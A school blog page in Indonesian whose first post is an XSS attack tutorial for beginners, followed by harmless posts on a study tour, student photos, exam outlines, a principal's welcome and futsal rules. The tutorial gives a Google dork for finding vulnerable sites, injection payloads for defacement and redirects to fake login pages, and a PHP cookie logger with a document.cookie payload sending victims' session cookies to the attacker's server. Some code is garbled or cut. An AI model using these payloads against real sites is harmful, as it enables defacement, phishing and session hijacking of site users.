.

XSS Attack Untuk Pemula

Author: smk yapin 02 setu | Posted at: 18.32 | Filed Under: hacker | 2 komentar

Ingin berbagi untuk teman-teman, mungkin kelihatannya jadul dan tidak asing lagi. Dengan yang namanya XSS dan seberapa bahayakah XSS itu, maka saya ingin membagikan sedikit cara penggunaan XSS, em... dimulai dari apakah XSS itu ?
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. XSS mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan XSS hanya membutuhkan sebuah browser saja.

Bagaimanakah menemukan Situs yang vulner?
Emmmmm......mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah memfilternya, tapi gimanapun kita masih bisa menyuruh teman yang paling baik di seluruh dunia untuk mencarinya, sapa lagi kalo bukan Mbah Google.
Betul, kita menggunakan Dork dengan query sebagai berikut:

" inurl:"search.php?q=" "

atau jika manual kita bisa mencoba fasilitas sebuah site seperti Guest book, Search Box, Shoutboxes, Comment atau forum.

Nah sekarang jika sudah kita ketemukan target kita akan mencoba mengexploit site itu dulu, apakah site itu mempunyai vulner terhadap XSS.
Ok sekarang kita coba menginjeksi dengan kode :

"alert("XSS")"

maka jika menampilkan dialog box seperti ini maka site itu vulner :

Tapi apakah sekedar itu saja, sekarang kita coba dengan metoda lain, apakah site itu bisa dideface kawan?bisa saja, sekarang kita coba bagaimana mengattack site yang vulner itu ok.
dengan penyisipan tag IMG SCR pada sebuah url atau pada comment sekali.
Apa itu IMG SCR tu bro? IMG SCR itu adalah semacam Tag pemangilan gambar dari suatu link tertentu untuk ditampilkan kepada website tersebut.
pemanggilan tag itu dengan code sebagai berikut :

tapi terlebih dahulu gambar deface kalian bisa upload dulu ke hostingan, misalnya ke photobucket atau flickr. setelah itu ganti url nya dengan url gambar tadi.
hingga menjadi seperti seperti berikut :

"

nah setelah siap kemudian sisipkan pada URl situs yang mempunyai bug tadi hingga menjadi seperti contoh.
"http://www.Target.ac.id/search/?q=

kemudian apa yang terjadi???
maka situs yang mempunyai bug tadi akan berubah tampilan menjadi gambar yang kita upload tadi.
misalnya contoh gini:

metode penyisipan lain selain dengan gambar juga bisa kita lakukan misalnya dengan file flash (SWF) hingga serangan ini mempunyai style tersendiri

" dengan penyisipan tag tersebut maka akan langsung meng exekusi file SWF pada link tersebut.atau mungkin dengan melakukan redirect ke situs lain misalnya dengan code :
" window.open( "http://www.google.com/" ) "

maka jika dieksekusi , kita akan di redirect ke situs google, mungkin biasa aja, tapi gimana klo dibawa ke suatu situs login palsu misalnya fake login yahoo, mungkin bisa berbahaya juga tuh.

Nah oleh karena itu XSS ini walaupun bug kecil tapi bisa berbahaya juga, misalnya dengan melakukan teknik Xss Cookies Stealing.

Apa itu Cookies Stealing . cookie stealing itu adalah mendapatkan cookie orang lain, supaya kamu dikenali oleh Situs target sebagai orang tersebut.

Nah buat pertamanya ambil Cookie Logger Di http://G0t-Root.net/tools/cookie.php
Atau salin aja code dibawah ini :
$c = $_GET['c'];
$file = fopen(?Log.txt?,'a?);
fwrite($file,$c);
fclose($file);
?>
Ok sekarang saya anggap kalian dah memilikinya save dengan extensien Php dan upload ke server lo, dan jangan lupa untuk membuat file LOG.TXT dengan chmod 777 dan sekarang kita langsung menuju ke website yang akan diserang.
masukan code ini

"window.location= "http://server-lu.com/cookielogger.php?c="+document.cookie "
atau

"document.location= "http://Server-lu.com/cookielogger.php?c="+document.cookie "
hingga otomatis url pada site berubah menjadi

"http://Target.com/search.php?q=document.location= "http://server-lu.com/cookielogger.php?c="+document.cookie "

Nah jika ada user berkunjung ke situs yang telah di inject tadi maka otomatis cookies tersebut akan terekam dan masuk kedalam log file yang telah dipersiapkan dan lo bisa mengawasi cookies yang didapatkan hingga ntar lo bisa meng hijack cookies tersebut.
Ne misalkan hasil cookies yang telah didapat :

" $ ls -la /home/theSiteUsername/tmp/ | grep sess
-rw------- 1 theSiteUsername theSiteUsername 5068 Sep 18 09:20 sess_1a1aexxxxxxx5e282e1a5747694ec8e2
-rw------- 1 theSiteUsername theSiteUsername 5023 Sep 18 09:19 sess_462fexxxxxxx13dafa331bc15e962e22
-rw------- 1 theSiteUsername theSiteUsername 5109 Sep 18 10:51 sess_717edxxxxxxx653df341f91d096e0484
-rw------- 1 theSiteUsername theSiteUsername 5079 Sep 18 09:14 sess_91850xxxxxxxef480524c23412b23dc1
-rw------- 1 theSiteUsername theSiteUsername 5011 Sep 18 10:38 sess_9246dxxxxxxxe6e710a9e623af23ca95
-rw------- 1 theSiteUsername theSiteUsername 5079 Sep 18 09:25 sess_a4cdcxxxxxxx065ede6ecb062d443f86 "

Nah sekian tutor pendeknya, semoga aja berguna n keep posting and share you knowledge.

study tour di bandung

Author: smk yapin 02 setu | Posted at: 01.31 | Filed Under: kegiatan sekolah | 0 komentar

anak-anak smk yapin 02 setu lgi di puspa iptek,bandung

puspa iptek bandung

7 ada anak 1 yg nongol nama"y indra"jawa"

pak ahmad satibi bergaya ala bagpacker g7

anak2 TKJ.A

Author: smk yapin 02 setu | Posted at: 21.24 | Filed Under: foto anak2 yapin | 0 komentar

cwok yg 1 nie gni2 jg ketua suku"y nak2 TKJ.A

\
cwek yg 1 nie dulu prnh menyabet rngking 1 di kls

cwek yg 1 nie walaupun bdn"y agak gede padahal emank gede baik jg lho

klo yg nie agak pendiem tapi klo dah ketawa.... buset kenceng bgt suara"y

yg nie foto"y sok imutz bgt kan mnk sbnr"y orng"y 7 imut sih ( item mutlak )

walau cwek nie kliatan"y agak tomboy tp sbnr"y dy jga baik&perhatian lho

klo gw gunawan kata orng sich q ni orngnya pendiem,penyayang,ganteng (ngarep) , keren (boro2) , imutz (apalagi) pertanyaan"y knp gw gk psang foto asli gw dsni :

krn ntar dpsng foto asli gw takut"y byk yg ngambil foto w and ntar pd ngefans ke w lagi

KISI-KISI UJIAN SEKOLAH

Author: smk yapin 02 setu | Posted at: 04.24 | Filed Under: lain-lain | 0 komentar

Atas permintaan sahabat SMK yapin 02 setu maka kami unggah kisi-kisi ujian sekolah tahun 2010 yang telah disusun oleh beberapa guru yang tergabung dalam mgmp se provinsi dki jakarta dan pengawas smk lima wilayah beberapa bulan yang lalu. Karena pada prinsipnya penyusunan soal ujian sekolah oleh sekolah masing-masing bagi yang memerlukan Kisi-kisi tersebut sudah kami unggah dan dapat dilihat sini:

http://download.smkdki.net/index.php?dir=kisi-kisi_ujian_sekolah2010

sambutan kepala sekolah

Author: smk yapin 02 setu | Posted at: 01.34 | Filed Under: sambutan | 0 komentar

Selamat Datang di blog smk yapin setu

Jln.Raya KUD No.44 B,Setu,Bekasi

blog ini kami luncurkan sebagai wujud komitmen kami terhadap pemanfaatan Teknologi Informasi dan Komunikasi dalam dunia Pendidikan. Peluncuran blog ini menandai suatu paradigma baru bahwa SMK Yapin 02 Setu ikut berpartisipasi dalam mengembangkan teknologi informasi (khususnya dunia pendidikan) di Kabupaten Bekasi.

Melalui blog ini kami akan mengembangkan e-learning & e-education untuk mendukung dan melengkapi metode pembelajaran yang sudah ada di sekolah kami. Dengan peluncuran web blog ini diharapkan dapat menjadi salah satu sarana informasi untuk siswa dalam mengakses e-learning & e-education, sehingga dapat menjadi manusia yang mampu bersaing di era Global sesuai dengan harapan orang tua, Bapak/Ibu guru dan seluruh komponen yang terlibat dalam proses pembelajaran.

Tidak lupa kami mengharap masukan berupa kritik dan saran yang konstruktif demi perbaikan website ini pada khususnya, maupun perbaikan kualitas Output pada umumnya.

Akhir kata kami berharap anda dapat mengakses informasi tentang SMK Yapin 02 Setu, dan bergabung bersama kami di http://smkyapinsetu.blogspot.com

ALUMNI Yapin

Author: smk yapin 02 setu | Posted at: 01.28 | Filed Under: foto anak2 yapin | 0 komentar

TIM Futsal di SMK Yapin 02 Setu

Author: smk yapin 02 setu | Posted at: 00.24 | Filed Under: kegiatan sekolah | 1 komentar

Gambar di atas merupakan TIM Ekskul Futsal di SMK Yapin 02 Setu. Ekskul Futsal merupakan salah satu Ekskul favorit bagi saya. Ekskul ini termasuk dalam salah satu cabang yang ikut aktif menyumbangkan gelar bagi SMK Yapin 02 Setu di bidang Olahraga. Di dalam Ekskul ini tidaklah hanya mementingkan kemampuan fisik saja, tetapi juga harus mampu menjaga komunikasi antara murid senior dan junior, hal ini dikarenakan Permainan ini membutuhkan suatu kesolidan dari setiap anggota tim. Salah satu jenis sepakbola ini dimainkan oleh 2 regu yang mana kedua regu yang bermain tersebut berjumlah 5 orang untuk masing-masing tim. Futsal sendiri memiliki beberapa aturan yang berbeda dengan sepakbola yaitu :Lapangan permainan
1. Ukuran: panjang 25-42 m x lebar 15-25 m
2. Garis batas: garis selebar 8 cm, yakni garis sentuh di sisi, garis gawang di ujung-ujung, dan garis melintang tengah lapangan; 3 m lingkaran tengah; tak ada tembok penghalang atau papan
3. Daerah penalti: busur berukuran 6 m dari setiap pos
4. Garis penalti: 6 m dari titik tengah garis gawang
5. Garis penalti kedua: 12 m dari titik tengah garis gawang
6. Zona pergantian: daerah 6 m (3 m pada setiap sisi garis tengah lapangan) pada sisi tribun dari pelemparan
7. Gawang: tinggi 2 m x lebar 3 m
8. Permukaan daerah pelemparan: halus, rata, dan tak abrasif

Bola
1. Ukuran: #4
2. Keliling: 62-64 cm
3. Berat: 390-430 gram
4. Lambungan: 55-65 cm pada pantulan pertama
5. Bahan: kulit atau bahan yang cocok lainnya (yaitu, tak berbahaya)

Jumlah pemain
1. Jumlah pemain maksimal untuk memulai pertandingan: 5, salah satunya penjaga gawang
2. Jumlah pemain minimal untuk mengakhiri pertandingan: 2
3. Jumlah pemain cadangan maksimal: 7
4. Batas jumlah pergantian pemain: tak terbatas
5. Metode pergantian: "pergantian melayang" (semua pemain kecuali penjaga gawang boleh memasuki dan meninggalkan lapangan kapan saja; pergantian penjaga gawang hanya dapat dilakukan jika bola tak sedang dimainkan dan dengan persetujuan wasit)

Perlengkapan pemain:
Kaos bernomor, celana pendek, kaus kaki, pelindung lutut, dan alas kaki bersolkan karet

Lama permainan
1. Lama: dua babak 20 menit; waktu diberhentikan ketika bola berhenti dimainkan. Waktu dapat diperpanjang untuk tendangan penalti.
2. Time-out: 1 per regu per babak; tak ada dalam waktu tambahan
3. Waktu pergantian babak: maksimal 10 menit

Bagaimana? menarik bukan Ekskul Futsal SMK Yapin. Bagi kamu-kamu siswa YAPIN ayo cepetan gabung dengan Ekskul Futsal SMK Yapin 02 Setu. kapanpun bisa !